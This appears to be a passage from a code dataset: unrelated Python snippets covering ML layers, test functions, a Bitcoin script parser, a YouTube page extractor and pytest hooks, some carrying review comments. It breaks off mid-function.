code
stringlengths
281
23.7M
def test_classmethod_from_builtins_inferred_as_bound() -> None:
    """Methods of an embedded class should infer as BoundMethod.

    NOTE(review): the embedded snippet appears to have lost decorator lines
    during flattening (blank gaps before bar1/bar2) — preserved verbatim.
    """
    code = '\n import builtins\n\n class Foo():\n \n def bar1(cls, text):\n pass\n\n \n def bar2(cls, text):\n pass\n\n Foo.bar1 #\n Foo.bar2 #\n '
    first_node, second_node = extract_node(code)
    inferred_first = next(first_node.infer())
    inferred_second = next(second_node.infer())
    assert isinstance(inferred_first, BoundMethod)
    assert isinstance(inferred_second, BoundMethod)
class ExternalCacheBatch(BatchBase):
    """A batch whose flush/cancel operations delegate to an external cache."""

    def __init__(self, cache, index):
        super(ExternalCacheBatch, self).__init__()
        self.cache = cache
        self.index = index

    def _try_switch_active_batch(self):
        # Rotate only if we are still the cache's active batch; bump the
        # index when this batch actually accumulated items.
        if self.cache._batch is self:
            next_index = self.index + (1 if self.items else 0)
            self.cache._batch = ExternalCacheBatch(self.cache, next_index)

    def _flush(self):
        self.cache._before_flush(self)
        self.cache._flush(self)

    def _cancel(self):
        self.cache._cancel_flush(self)
class UNetDown(nn.Module):
    """U-Net encoder stage: strided 4x4 conv (halves spatial size), optional
    InstanceNorm, LeakyReLU(0.2), optional dropout."""

    def __init__(self, in_size, out_size, normalize=True, dropout=0.0):
        super(UNetDown, self).__init__()
        blocks = [nn.Conv2d(in_size, out_size, 4, 2, 1, bias=False)]
        if normalize:
            blocks.append(nn.InstanceNorm2d(out_size))
        blocks.append(nn.LeakyReLU(0.2))
        if dropout:
            blocks.append(nn.Dropout(dropout))
        self.model = nn.Sequential(*blocks)

    def forward(self, x):
        return self.model(x)
def scan_can_remove_outs(op, out_idxs):
    """Split ``out_idxs`` into Scan outputs that must be kept and those that
    can be removed, based on which inner outputs feed required inner inputs.

    Returns ``(required_outs, not_required)``.
    """
    # Inputs needed by the outputs we are definitely keeping.
    kept_outputs = [o for i, o in enumerate(op.inner_outputs) if i not in out_idxs]
    required_inputs = list(graph_inputs(kept_outputs))

    # Associate every output with the inner inputs belonging to its taps.
    out_ins = []
    offset = op.info.n_seqs
    for idx, tap in enumerate(chain(op.info.mit_mot_in_slices,
                                    op.info.mit_sot_in_slices,
                                    op.info.sit_sot_in_slices)):
        n_ins = len(tap)
        out_ins += [op.inner_inputs[offset:offset + n_ins]]
        offset += n_ins
    out_ins += [[] for _ in range(op.info.n_nit_sot)]
    out_ins += [[op.inner_inputs[offset + k]] for k in range(op.info.n_shared_outs)]

    # Fixed point: an output whose inputs are required becomes required too.
    added = True
    out_idxs_mask = [1 for _ in out_idxs]
    while added:
        added = False
        for pos, idx in enumerate(out_idxs):
            if out_idxs_mask[pos] and any(x in required_inputs for x in out_ins[idx]):
                out_idxs_mask[pos] = 0
                required_inputs += list(graph_inputs([op.inner_outputs[idx]]))
                added = True

    required_outs = [x for i, x in enumerate(out_idxs) if out_idxs_mask[i] == 0]
    not_required = [x for i, x in enumerate(out_idxs) if out_idxs_mask[i] == 1]
    return (required_outs, not_required)
def obtian_tes():
    """Build test sequences from the global session data.

    NOTE(review): keeps the original (misspelled) public name so callers are
    unaffected. Sessions whose remapped click sequence is shorter than 2
    items are dropped. Returns (test_ids, test_dates, test_seqs).
    """
    test_ids = []
    test_seqs = []
    test_dates = []
    for sess_id, date in tes_sess:
        # Remap item ids, silently skipping items not present in item_dict.
        mapped = [item_dict[i] for i in sess_clicks[sess_id] if i in item_dict]
        if len(mapped) < 2:
            continue
        test_ids += [sess_id]
        test_dates += [date]
        test_seqs += [mapped]
    return (test_ids, test_dates, test_seqs)
def main(client, config):
    """Q30-style benchmark: count co-occurring item-category pairs within
    user click sessions and return the top ``q30_limit`` pairs by count."""
    item_df = benchmark(read_tables, config=config,
                        compute_result=config['get_read_time'])
    f_item_df = item_df[item_df['i_category_id'].notnull()].reset_index(drop=True)

    wcs_files = glob.glob(os.path.join(config['data_dir'],
                                       'web_clickstreams/*.parquet'))
    tasks = [delayed(pre_repartition_task)(fn, f_item_df.to_delayed()[0])
             for fn in wcs_files]

    # Meta frame so dask_cudf knows the partition schema up front.
    meta_df = cudf.DataFrame({
        'wcs_user_sk': np.ones(1, dtype=np.int64),
        'tstamp_inSec': np.ones(1, dtype=np.int64),
        'i_category_id': np.ones(1, dtype=np.int8),
    })
    merged_df = dask_cudf.from_delayed(tasks, meta=meta_df)
    merged_df = merged_df.shuffle(on=['wcs_user_sk'])

    distinct_session_df = merged_df.map_partitions(
        get_distinct_sessions,
        keep_cols=['wcs_user_sk', 'i_category_id'],
        time_out=q30_session_timeout_inSec)
    del merged_df

    pair_df = distinct_session_df.map_partitions(
        get_pairs,
        pair_col='i_category_id',
        output_col_1='category_id_1',
        output_col_2='category_id_2')
    del distinct_session_df

    grouped_df = pair_df.groupby(['category_id_1', 'category_id_2']).size(
        split_every=2).reset_index()
    grouped_df.columns = ['category_id_1', 'category_id_2', 'cnt']

    result_df = grouped_df.repartition(npartitions=1).persist()
    result_df = result_df.map_partitions(
        lambda part: part.sort_values('cnt', ascending=False))
    return result_df.reset_index(drop=True).head(q30_limit)
class VanSpatialAttentionLayer(nn.Module):
    """VAN spatial attention: 1x1 conv + activation, large-kernel attention,
    closing 1x1 conv, with a residual connection."""

    def __init__(self, hidden_size: int, hidden_act: str = 'gelu'):
        super().__init__()
        self.pre_projection = nn.Sequential(
            OrderedDict([
                ('conv', nn.Conv2d(hidden_size, hidden_size, kernel_size=1)),
                ('act', ACT2FN[hidden_act]),
            ])
        )
        self.attention_layer = VanLargeKernelAttentionLayer(hidden_size)
        self.post_projection = nn.Conv2d(hidden_size, hidden_size, kernel_size=1)

    def forward(self, hidden_state):
        residual = hidden_state
        out = self.pre_projection(hidden_state)
        out = self.attention_layer(out)
        out = self.post_projection(out)
        return out + residual
# NOTE(review): the '@' of this decorator appears to have been lost when the
# file was flattened; restored here — confirm the decorator name against the
# original source (qiling's macOS kernel API hooks).
@_kernel_api(params={'_identifier': POINTER, '_callback': POINTER, '_idata': POINTER})
def hook__kauth_listen_scope(ql, address, params):
    """Register a kauth scope-listener callback with the event manager.

    Derives the event name from the scope identifier string (e.g.
    'com.apple.kauth.vnode' -> 'KAUTH_VNODE') and returns the identifier
    pointer unchanged.
    """
    ev_name = (ql.mem.string(params['_identifier'])
               .replace('com.', '')
               .replace('apple.', '')
               .upper()
               .replace('.', '_'))
    ql.os.ev_manager.register(params['_callback'], ev_name.encode(),
                              MacOSEventType[('EV_' + ev_name)])
    ql.log.debug(('New kauth callback has been registered: %s' % ev_name))
    return params['_identifier']
def test_supp_shape_from_ref_param_shape():
    """Error cases and shape extraction for supp_shape_from_ref_param_shape."""
    with pytest.raises(ValueError, match='^ndim_supp*'):
        supp_shape_from_ref_param_shape(
            ndim_supp=0, dist_params=(np.array([1, 2]), 0), ref_param_idx=0)

    res = supp_shape_from_ref_param_shape(
        ndim_supp=1, dist_params=(np.array([1, 2]), np.eye(2)), ref_param_idx=0)
    assert res == (2,)

    # Explicit param_shapes take precedence over the params themselves.
    res = supp_shape_from_ref_param_shape(
        ndim_supp=1, dist_params=(np.array([1, 2]), 0),
        param_shapes=((2,), ()), ref_param_idx=0)
    assert res == (2,)

    with pytest.raises(ValueError, match='^Reference parameter*'):
        supp_shape_from_ref_param_shape(
            ndim_supp=1, dist_params=(np.array(1),), ref_param_idx=0)

    res = supp_shape_from_ref_param_shape(
        ndim_supp=2, dist_params=(np.array([1, 2]), np.ones((2, 3, 4))),
        ref_param_idx=1)
    assert res == (3, 4)

    res = supp_shape_from_ref_param_shape(
        ndim_supp=2, dist_params=(np.array([1, 2]), np.ones((2, 3, 4))),
        param_shapes=((2,), (2, 3, 4)), ref_param_idx=1)
    assert res == (3, 4)
# NOTE(review): decorator lines lost their '@name' prefixes during
# flattening ('_if_asan_class', bare '(per_param_sharding=...)' and
# '(verbosity=...)' lines). Reconstructed below as the conventional
# torchrec/hypothesis stack — confirm against the original source.
@skip_if_asan_class
class ConstructParameterShardingAndShardTest(MultiProcessTestBase):
    """End-to-end test: build a module sharding plan and shard an EBC."""

    @given(per_param_sharding=st.sampled_from([
        {'table_0': data_parallel(), 'table_1': data_parallel()},
        {'table_0': table_wise(rank=0), 'table_1': table_wise(rank=1)},
        {'table_0': row_wise(), 'table_1': row_wise()},
        {'table_0': column_wise(ranks=[0, 1]), 'table_1': column_wise(ranks=[0, 1])},
    ]))
    @settings(verbosity=Verbosity.verbose, max_examples=8, deadline=None)
    def test_parameter_sharding_ebc(
            self,
            per_param_sharding: Dict[(str, ParameterShardingGenerator)]) -> None:
        WORLD_SIZE = 2
        embedding_bag_config = [
            EmbeddingBagConfig(name='table_0', feature_names=['feature_0'],
                               embedding_dim=16, num_embeddings=4),
            EmbeddingBagConfig(name='table_1', feature_names=['feature_1'],
                               embedding_dim=16, num_embeddings=4),
        ]
        kjt_input_per_rank = [
            KeyedJaggedTensor.from_lengths_sync(
                keys=['feature_0', 'feature_1'],
                values=torch.LongTensor([0, 1, 2, 0, 1, 2]),
                lengths=torch.LongTensor([2, 0, 1, 2, 0, 1])),
            KeyedJaggedTensor.from_lengths_sync(
                keys=['feature_0', 'feature_1'],
                values=torch.LongTensor([3, 2, 1, 2, 0, 1, 2, 3, 2, 3, 2]),
                lengths=torch.LongTensor([2, 2, 4, 2, 0, 1])),
        ]
        module_sharding_plan = construct_module_sharding_plan(
            EmbeddingBagCollection(tables=embedding_bag_config),
            per_param_sharding=per_param_sharding,
            local_size=WORLD_SIZE,
            world_size=WORLD_SIZE,
            device_type=('cuda' if torch.cuda.is_available() else 'cpu'))
        # Row-wise sharding requires GPUs; skip on CPU-only hosts.
        if ((not torch.cuda.is_available())
                and (module_sharding_plan['table_0'].sharding_type
                     == ShardingType.ROW_WISE.value)):
            return
        self._run_multi_process_test(
            callable=_test_sharding,
            world_size=WORLD_SIZE,
            tables=embedding_bag_config,
            initial_state_dict={
                'embedding_bags.table_0.weight': torch.Tensor(
                    [([1] * 16), ([2] * 16), ([3] * 16), ([4] * 16)]),
                'embedding_bags.table_1.weight': torch.Tensor(
                    [([101] * 16), ([102] * 16), ([103] * 16), ([104] * 16)]),
            },
            kjt_input_per_rank=kjt_input_per_rank,
            backend=('nccl' if torch.cuda.is_available() else 'gloo'),
            module_sharding_plan=module_sharding_plan)
class TestValidFormats(unittest.TestCase):
    """Sanity checks on the core.VALID_FORMATS registry."""

    def test_wav(self):
        self.assertIn('wav', core.VALID_FORMATS)

    def test_aiff(self):
        self.assertIn('aiff', core.VALID_FORMATS)

    def test_notin(self):
        # Header/label words from the format table must not leak in.
        for bogus in ('AUDIO', 'FILE', 'FORMATS', 'AUDIO FILE FORMATS'):
            self.assertNotIn(bogus, core.VALID_FORMATS)
class QCModel(_QCBase):
    """Method/basis pair describing a quantum-chemistry model."""

    method: str
    basis: (str | QCBasisSet)

    # NOTE(review): the `cls`-first signatures below strongly suggest
    # @classmethod decorators were lost when this file was flattened;
    # restored — confirm against the original source.
    @classmethod
    def from_dict(cls, data: dict[(str, Any)]) -> QCModel:
        """Build a QCModel from a dict, converting a nested basis dict."""
        basis: ((str | dict[(str, Any)]) | QCBasisSet) = data.pop('basis')
        if isinstance(basis, dict):
            basis = QCBasisSet.from_dict(basis)
        return cls(**data, basis=basis)

    def to_hdf5(self, group: h5py.Group) -> None:
        """Serialize into an HDF5 group: structured basis as a subgroup,
        string basis as an attribute."""
        if isinstance(self.basis, QCBasisSet):
            basis_group = group.require_group('basis')
            self.basis.to_hdf5(basis_group)
        else:
            group.attrs['basis'] = self.basis
        group.attrs['method'] = self.method

    @classmethod
    def _from_hdf5_group(cls, h5py_group: h5py.Group) -> QCModel:
        """Inverse of to_hdf5."""
        basis: (str | QCBasisSet)
        if 'basis' in h5py_group.keys():
            basis = cast(QCBasisSet, QCBasisSet.from_hdf5(h5py_group['basis']))
        else:
            basis = h5py_group.attrs['basis']
        return cls(method=h5py_group.attrs['method'], basis=basis)
def read_object_labels_csv(file, header=True):
    """Parse a multi-label CSV: column 0 is the image name, the remaining
    columns are per-category labels. Returns a list of
    ``(name, FloatTensor)`` tuples. When ``header`` is truthy, row 0 is
    treated as a header and skipped.
    """
    images = []
    num_categories = 0
    print('[dataset] read', file)
    with open(file, 'r') as f:
        reader = csv.reader(f)
        rownum = 0
        for row in reader:
            if header and rownum == 0:
                header = row  # consume header row; stays truthy afterwards
            else:
                if num_categories == 0:
                    num_categories = len(row) - 1
                name = row[0]
                labels = torch.from_numpy(
                    np.asarray(row[1:num_categories + 1]).astype(np.float32))
                images.append((name, labels))
            rownum += 1
    return images
def test_view_functions_arent_modified_globally():
    """Registering the same blueprint on two apps must not corrupt the view
    function (FlaskInjector must not mutate it globally)."""
    class MyView(View):
        pass

    blueprint = Blueprint('test', __name__)
    blueprint.add_url_rule('/', view_func=MyView.as_view('view'))

    # Registering twice would fail if the first FlaskInjector pass had
    # modified the shared view function in place.
    for _ in range(2):
        app = Flask(__name__)
        app.register_blueprint(blueprint)
        FlaskInjector(app=app)
def get_optimizer(optim_config, parameters):
    """Build a torch optimizer from ``optim_config``.

    ``optim_config`` must expose ``optimizer`` ('Adam', 'RMSProp' or 'SGD'),
    ``lr`` and, depending on the choice, ``weight_decay`` / ``beta1``.

    Raises:
        NotImplementedError: for an unrecognized ``optim_config.optimizer``.
            (BUG FIX: the original *returned* the exception instead of
            raising it, so callers silently received an exception object.)
    """
    if optim_config.optimizer == 'Adam':
        return torch.optim.Adam(parameters, lr=optim_config.lr,
                                weight_decay=optim_config.weight_decay,
                                betas=(optim_config.beta1, 0.999))
    elif optim_config.optimizer == 'RMSProp':
        return torch.optim.RMSprop(parameters, lr=optim_config.lr,
                                   weight_decay=optim_config.weight_decay)
    elif optim_config.optimizer == 'SGD':
        return torch.optim.SGD(parameters, lr=optim_config.lr, momentum=0.9)
    raise NotImplementedError(
        'Optimizer {} not understood.'.format(optim_config.optimizer))
class Effect4461(BaseEffect):
    """Federation Navy implant set bonus: multiplies the scan magnetometric
    strength modifier on all Cybernetics-requiring implants."""

    runTime = 'early'
    type = 'passive'

    def handler(fit, implant, context, projectionRange, **kwargs):
        fit.appliedImplants.filteredItemMultiply(
            lambda target: target.item.requiresSkill('Cybernetics'),
            'scanMagnetometricStrengthModifier',
            implant.getModifiedItemAttr('implantSetLGFederationNavy'),
            **kwargs)
# NOTE(review): the '@pytest.mark' prefix appears to have been lost when
# this file was flattened (the line starts with bare '.parametrize');
# restored — confirm against the original test module.
@pytest.mark.parametrize('version, expected', [
    ('1', '1.0.1'), ('1.2', '1.2.1'), ('1.2.3', '1.2.4'),
    ('2!1.2.3', '2!1.2.4'), ('1.2.3+local', '1.2.4'), ('1.2.3.4', '1.2.4.0'),
    ('1.dev0', '1'), ('1.2dev0', '1.2'), ('1.2.3dev0', '1.2.3'),
    ('1.2.3.4dev0', '1.2.4.0'), ('1.post1', '1.0.1'), ('1.2.post1', '1.2.1'),
    ('1.2.3.post1', '1.2.4'), ('1.post1.dev0', '1.0.1'),
    ('1.2.post1.dev0', '1.2.1'), ('1.2.3.post1.dev0', '1.2.4'),
    ('1.a1', '1'), ('1.2a1', '1.2'), ('1.2.3a1', '1.2.3'),
    ('1.2.3.4a1', '1.2.4.0'), ('1.a1.post2', '1'), ('1.2a1.post2', '1.2'),
    ('1.2.3a1.post2', '1.2.3'), ('1.2.3.4a1.post2', '1.2.4.0'),
    ('1.a1.post2.dev0', '1'), ('1.2a1.post2.dev0', '1.2'),
    ('1.2.3a1.post2.dev0', '1.2.3'), ('1.2.3.4a1.post2.dev0', '1.2.4.0'),
])
def test_next_patch(version: str, expected: str) -> None:
    """next_patch() bumps the patch component and drops pre/dev/local parts."""
    v = PEP440Version.parse(version)
    assert v.next_patch().text == expected
def RSU5(x, mid_ch=12, out_ch=3):
    """RSU-5 block (U^2-Net): 4-level encoder/decoder with a residual
    connection from the block's input projection."""
    hx_in = REBNCONV(x, out_ch, 1)

    # Encoder path: conv then 2x2 max-pool at each level.
    hx1 = REBNCONV(hx_in, mid_ch, 1)
    hx = MaxPool2D(2, 2)(hx1)
    hx2 = REBNCONV(hx, mid_ch, 1)
    hx = MaxPool2D(2, 2)(hx2)
    hx3 = REBNCONV(hx, mid_ch, 1)
    hx = MaxPool2D(2, 2)(hx3)
    hx4 = REBNCONV(hx, mid_ch, 1)

    # NOTE(review): the dilated bottleneck conv takes the *pooled* tensor,
    # not hx4 — the reference U^2-Net RSU5 feeds hx4 here; confirm intent.
    hx = REBNCONV(hx, mid_ch, 2)

    # Decoder path: concat with the matching encoder feature, conv, upsample.
    hx = REBNCONV(tf.concat([hx, hx4], axis=-1), mid_ch, 1)
    hx = _upsample_like(hx, hx3)
    hx = REBNCONV(tf.concat([hx, hx3], axis=-1), mid_ch, 1)
    hx = _upsample_like(hx, hx2)
    hx = REBNCONV(tf.concat([hx, hx2], axis=-1), mid_ch, 1)
    hx = _upsample_like(hx, hx1)
    hx = REBNCONV(tf.concat([hx, hx1], axis=-1), out_ch, 1)

    return hx + hx_in
# NOTE(review): both '@pytest.mark' prefixes appear to have been lost when
# this file was flattened; restored — confirm against the original module.
@pytest.mark.parametrize('verbosity', (0, 1, 2))
@pytest.mark.parametrize('use_report_result_path', (False, True))
def test_json_format_success(capsys, verbosity, use_report_result_path):
    """JSON reporter emits the expected payload at each verbosity level,
    through both report_result and report_success entry points."""
    reporter = JsonReporter(verbosity=verbosity, pretty=False)
    if use_report_result_path:
        reporter.report_result(_make_success_result())
    else:
        reporter.report_success(_make_success_result())
    captured = capsys.readouterr()
    assert captured.err == ''
    if verbosity == 0:
        assert captured.out == '{"status":"ok"}\n'
    elif verbosity == 1:
        assert captured.out == '{"status":"ok","errors":[]}\n'
    else:
        assert captured.out == '{"status":"ok","errors":[],"checked_paths":["foo.json"]}\n'
class MessageAPI(ABC):
    """Abstract API for an EVM-style call/create message."""

    code: bytes
    _code_address: Address
    create_address: Address
    data: BytesOrView
    depth: int
    gas: int
    is_static: bool
    sender: Address
    should_transfer_value: bool
    _storage_address: Address
    to: Address
    value: int
    gas_price: int

    # BUG FIX: the original listed '_storage_addressto' — the two slot names
    # '_storage_address' and 'to' fused together — so neither real attribute
    # was actually slotted in concrete subclasses.
    __slots__ = ['code', '_code_address', 'create_address', 'data', 'depth',
                 'gas', 'is_static', 'sender', 'should_transfer_value',
                 '_storage_address', 'to', 'value']

    # NOTE(review): these look like @property/@abstractmethod stubs whose
    # decorators were lost in flattening; left undecorated to avoid guessing.
    def code_address(self) -> Address:
        ...

    def storage_address(self) -> Address:
        ...

    def is_create(self) -> bool:
        ...

    def data_as_bytes(self) -> bytes:
        ...
def compute_f1_score(preds, gts, ignores=()):
    """Per-class F1 from logits ``preds`` of shape (N, C) and integer
    targets ``gts`` of shape (N,).

    Classes listed in ``ignores`` are dropped from the returned numpy array.
    BUG FIX: the mutable default argument ``ignores=[]`` is replaced with an
    immutable empty tuple (same semantics for all callers).
    """
    C = preds.size(1)
    keep = torch.LongTensor(sorted(set(range(C)) - set(ignores)))
    # Confusion matrix via bincount: rows = ground truth, cols = prediction.
    hist = torch.bincount(gts * C + preds.argmax(1),
                          minlength=C ** 2).view(C, C).float()
    diag = torch.diag(hist)
    # clamp(min=1) guards against division by zero for absent classes.
    recalls = diag / hist.sum(1).clamp(min=1)
    precisions = diag / hist.sum(0).clamp(min=1)
    f1 = (2 * recalls * precisions) / (recalls + precisions).clamp(min=1e-08)
    return f1[keep].cpu().numpy()
# NOTE(review): four decorator lines lost their '@name' prefixes during
# flattening ('.bedtools', '.parametrize', bare settings/given tuples);
# reconstructed as the conventional pyranges test stack — confirm against
# the original source.
@pytest.mark.bedtools
@pytest.mark.parametrize('nearest_how,overlap,strandedness',
                         product(nearest_hows, overlaps, strandedness))
@settings(max_examples=max_examples, deadline=deadline, print_blob=True,
          suppress_health_check=HealthCheck.all())
@given(gr=dfs_min(), gr2=dfs_min())
def test_nearest(gr, gr2, nearest_how, overlap, strandedness):
    """Compare gr.nearest(...) against the output of `bedtools closest`."""
    nearest_command = 'bedtools closest {bedtools_how} {strand} {overlap} -t first -d -a <(sort -k1,1 -k2,2n {f1}) -b <(sort -k1,1 -k2,2n {f2})'
    bedtools_result = run_bedtools(nearest_command, gr, gr2, strandedness,
                                   overlap, nearest_how)
    bedtools_df = pd.read_csv(
        StringIO(bedtools_result), header=None,
        names='Chromosome Start End Strand Chromosome2 Distance'.split(),
        usecols=[0, 1, 2, 5, 6, 12], sep='\t')
    bedtools_df.Distance = bedtools_df.Distance.abs()
    # '.' marks rows with no closest feature; drop them.
    bedtools_df = bedtools_df[(bedtools_df.Chromosome2 != '.')]
    bedtools_df = bedtools_df.drop('Chromosome2', axis=1)
    result = gr.nearest(gr2, strandedness=strandedness, overlap=overlap,
                        how=nearest_how)
    print(('bedtools ' * 5))
    print(bedtools_df)
    print(('result ' * 5))
    print(result)
    compare_results_nearest(bedtools_df, result)
class TeamCompulsion(TourneyButton):
    """Button that toggles whether a team name is required to register."""

    def __init__(self, ctx: Context, letter: str):
        super().__init__(emoji=ri(letter))
        self.ctx = ctx

    async def callback(self, interaction: discord.Interaction):
        await interaction.response.defer()
        record = self.view.record
        record.teamname_compulsion = not record.teamname_compulsion
        await self.ctx.success(
            f"Now Team Name **{('is' if self.view.record.teamname_compulsion else 'is not')}** required to register.",
            3)
        await self.view.refresh_view()
def stop_memory_tracing(memory_trace: Optional[MemoryTrace] = None,
                        ignore_released_memory: bool = True) -> Optional[MemorySummary]:
    """Stop memory tracing and summarize the trace.

    Returns a MemorySummary with per-step deltas (``sequential``),
    per-frame totals sorted by combined increase (``cumulative``), absolute
    usage per step sorted descending (``current``) and a grand ``total``;
    or None when the trace holds fewer than two samples.
    """
    global _is_memory_tracing_enabled
    _is_memory_tracing_enabled = False

    if memory_trace is None or len(memory_trace) <= 1:
        return None

    memory_diff_trace = []
    memory_curr_trace = []
    cumulative = defaultdict(lambda: [0, 0, 0])

    # Walk consecutive sample pairs to compute per-step increments.
    for (frame, cpu_mem, gpu_mem), (next_frame, next_cpu_mem, next_gpu_mem) in zip(
            memory_trace[:-1], memory_trace[1:]):
        cpu_inc = next_cpu_mem - cpu_mem
        gpu_inc = next_gpu_mem - gpu_mem
        both_inc = cpu_inc + gpu_inc
        memory_diff_trace.append(
            MemoryState(frame=frame, cpu=Memory(cpu_inc), gpu=Memory(gpu_inc),
                        cpu_gpu=Memory(both_inc)))
        memory_curr_trace.append(
            MemoryState(frame=frame, cpu=Memory(next_cpu_mem),
                        gpu=Memory(next_gpu_mem),
                        cpu_gpu=Memory(next_gpu_mem + next_cpu_mem)))
        cumulative[frame][0] += cpu_inc
        cumulative[frame][1] += gpu_inc
        cumulative[frame][2] += both_inc

    ordered = sorted(cumulative.items(), key=lambda kv: kv[1][2], reverse=True)
    cumulative_memory = [
        MemoryState(frame=frame, cpu=Memory(cpu_inc), gpu=Memory(gpu_inc),
                    cpu_gpu=Memory(both_inc))
        for frame, (cpu_inc, gpu_inc, both_inc) in ordered
    ]
    memory_curr_trace = sorted(memory_curr_trace,
                               key=lambda state: state.cpu_gpu.bytes,
                               reverse=True)

    if ignore_released_memory:
        # Count only growth; frees do not offset the total.
        total = sum(max(0, step.cpu_gpu.bytes) for step in memory_diff_trace)
    else:
        total = sum(step.cpu_gpu.bytes for step in memory_diff_trace)

    return MemorySummary(sequential=memory_diff_trace,
                         cumulative=cumulative_memory,
                         current=memory_curr_trace,
                         total=Memory(total))
def script_GetOp(_bytes: bytes):
    """Yield ``(opcode, pushed_data_or_None, next_index)`` triples while
    walking a serialized Bitcoin script.

    Raises MalformedBitcoinScript when a PUSHDATA length prefix is truncated.
    """
    i = 0
    total = len(_bytes)
    while i < total:
        vch = None
        opcode = _bytes[i]
        i += 1
        if opcode <= opcodes.OP_PUSHDATA4:
            # Direct pushes encode the length in the opcode itself;
            # OP_PUSHDATA1/2/4 carry an explicit 1/2/4-byte length prefix.
            nSize = opcode
            if opcode == opcodes.OP_PUSHDATA1:
                try:
                    nSize = _bytes[i]
                except IndexError:
                    raise MalformedBitcoinScript()
                i += 1
            elif opcode == opcodes.OP_PUSHDATA2:
                try:
                    (nSize,) = struct.unpack_from('<H', _bytes, i)
                except struct.error:
                    raise MalformedBitcoinScript()
                i += 2
            elif opcode == opcodes.OP_PUSHDATA4:
                try:
                    (nSize,) = struct.unpack_from('<I', _bytes, i)
                except struct.error:
                    raise MalformedBitcoinScript()
                i += 4
            vch = _bytes[i:i + nSize]
            i += nSize
        yield (opcode, vch, i)
def initial_player_response(watch_html: str) -> str:
    """Extract the ytInitialPlayerResponse object from a watch-page HTML.

    Tries each known assignment pattern in order; raises RegexMatchError
    when none matches.
    """
    patterns = [
        'window\\[[\'\\"]ytInitialPlayerResponse[\'\\"]]\\s*=\\s*',
        'ytInitialPlayerResponse\\s*=\\s*',
    ]
    for pattern in patterns:
        try:
            return parse_for_object(watch_html, pattern)
        except HTMLParseError:
            continue
    raise RegexMatchError(caller='initial_player_response',
                          pattern='initial_player_response_pattern')
def _create_actor(rank: int, num_actors: int, num_cpus_per_actor: int,
                  num_gpus_per_actor: int,
                  resources_per_actor: Optional[Dict] = None,
                  placement_group: Optional[PlacementGroup] = None,
                  queue: Optional[Queue] = None,
                  checkpoint_frequency: int = 5,
                  distributed_callbacks: Optional[Sequence[DistributedCallback]] = None) -> ActorHandle:
    """Create one remote XGBoost actor scheduled inside the placement group
    (or the default group when none is given)."""
    strategy = PlacementGroupSchedulingStrategy(
        placement_group=(placement_group or DEFAULT_PG),
        placement_group_capture_child_tasks=True)
    actor_cls = _RemoteRayXGBoostActor.options(
        num_cpus=num_cpus_per_actor,
        num_gpus=num_gpus_per_actor,
        resources=resources_per_actor,
        scheduling_strategy=strategy)
    return actor_cls.remote(
        rank=rank,
        num_actors=num_actors,
        queue=queue,
        checkpoint_frequency=checkpoint_frequency,
        distributed_callbacks=distributed_callbacks)
class TestVector(TestCase):
    """Unit tests for pybamm.Vector."""

    def setUp(self):
        self.x = np.array([[1], [2], [3]])
        self.vect = pybamm.Vector(self.x)

    def test_array_wrapper(self):
        self.assertEqual(self.vect.ndim, 2)
        self.assertEqual(self.vect.shape, (3, 1))
        self.assertEqual(self.vect.size, 3)

    def test_column_reshape(self):
        vect1d = pybamm.Vector(np.array([1, 2, 3]))
        np.testing.assert_array_equal(self.vect.entries, vect1d.entries)

    def test_list_entries(self):
        # Flat and nested lists should both produce a column vector.
        expected = np.array([[1], [2], [3]])
        for entries in ([1, 2, 3], [[1], [2], [3]]):
            np.testing.assert_array_equal(pybamm.Vector(entries).entries,
                                          expected)

    def test_vector_evaluate(self):
        np.testing.assert_array_equal(self.vect.evaluate(), self.x)

    def test_vector_operations(self):
        np.testing.assert_array_equal((self.vect + self.vect).evaluate(),
                                      2 * self.x)
        np.testing.assert_array_equal((self.vect - self.vect).evaluate(),
                                      0 * self.x)
        np.testing.assert_array_equal((self.vect * self.vect).evaluate(),
                                      np.array([[1], [4], [9]]))

    def test_wrong_size_entries(self):
        with self.assertRaisesRegex(
                ValueError, 'Entries must have 1 dimension or be column vector'):
            pybamm.Vector(np.ones((4, 5)))
class BasicBlock(nn.Module):
    """Standard ResNet basic block: two 3x3 convs with BatchNorm plus an
    identity (or downsampled) skip connection."""

    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super().__init__()
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        identity = x
        y = self.relu(self.bn1(self.conv1(x)))
        y = self.bn2(self.conv2(y))
        if self.downsample is not None:
            identity = self.downsample(x)
        y += identity
        return self.relu(y)
def run(model):
    """Render the model's species/reaction graph as a pygraphviz string.

    Species present in the initial conditions get a distinct fill color.
    Raises ImportError when pygraphviz is unavailable.
    """
    if pygraphviz is None:
        raise ImportError('pygraphviz library is required to run this function')
    pysb.bng.generate_equations(model)
    graph = pygraphviz.AGraph(directed=True, rankdir='LR')
    ic_species = [ic.pattern for ic in model.initials]
    for i, cp in enumerate(model.species):
        species_node = 's%d' % i
        slabel = re.sub('% ', '%\\\\l', str(cp))
        slabel += '\\l'
        # Highlight species that appear in the initial conditions.
        is_initial = any(s.is_equivalent_to(cp) for s in ic_species)
        color = '#aaffff' if is_initial else '#ccffcc'
        graph.add_node(species_node, label=species_node, shape='Mrecord',
                       fillcolor=color, style='filled', color='transparent',
                       fontsize='12', margin='0.06,0')
    for i, reaction in enumerate(model.reactions):
        reactants = set(reaction['reactants'])
        products = set(reaction['products'])
        attr_reversible = {}
        for s in reactants:
            for p in products:
                r_link(graph, s, p, **attr_reversible)
    return graph.string()
# NOTE(review): the '@pytest.hookimpl' prefix appears to have been lost when
# this file was flattened (the line starts with a bare keyword-argument
# tuple); restored — confirm against the original source.
@pytest.hookimpl(wrapper=True, tryfirst=True)
def pytest_runtest_protocol(item: Item) -> Generator[None, object, object]:
    """Install assertion-introspection hooks around a test run.

    Sets up the comparison-repr callback (and optionally the assertion-pass
    callback) for the duration of the test, restoring the previous hooks in
    a finally block.
    """
    ihook = item.ihook

    def callbinrepr(op, left: object, right: object) -> Optional[str]:
        # Ask plugins for a custom comparison explanation; fall back to None.
        hook_result = ihook.pytest_assertrepr_compare(
            config=item.config, op=op, left=left, right=right)
        for new_expl in hook_result:
            if new_expl:
                new_expl = truncate.truncate_if_required(new_expl, item)
                new_expl = [line.replace('\n', '\\n') for line in new_expl]
                res = '\n~'.join(new_expl)
                if item.config.getvalue('assertmode') == 'rewrite':
